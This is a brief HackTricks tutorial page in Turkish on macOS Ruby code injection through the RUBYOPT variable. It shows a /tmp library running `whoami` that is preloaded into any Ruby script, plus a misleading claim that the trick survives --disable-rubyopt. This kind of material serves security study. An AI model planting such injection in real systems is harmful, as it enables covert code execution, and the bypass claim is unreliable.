HackTricksmacOS Ruby Uygulamaları Enjeksiyonu
Reading time: 2 minutes
tip
AWS Hacking'i öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: 
HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
- Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.
RUBYOPT
Bu ortam değişkenini kullanarak ruby her çalıştırıldığında yeni parametreler eklemek mümkündür. Ancak -e parametresi çalıştırılacak ruby kodunu belirtmek için kullanılamaz, bununla birlikte -I ve -r parametrelerini kullanarak yükleme yolu için yeni bir klasör eklemek ve ardından yüklemek için bir kütüphane belirtmek mümkündür.
/tmp dizininde inject.rb kütüphanesini oluşturun:
puts `whoami`
Herhangi bir yerde aşağıdaki gibi bir ruby betiği oluşturun:
puts 'Hello, World!'
Arbitrary bir ruby betiği ile yükleyin:
RUBYOPT="-I/tmp -rinject" ruby hello.rb
Eğlenceli bir gerçek, --disable-rubyopt parametresi ile bile çalışıyor:
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
tip
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
- Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.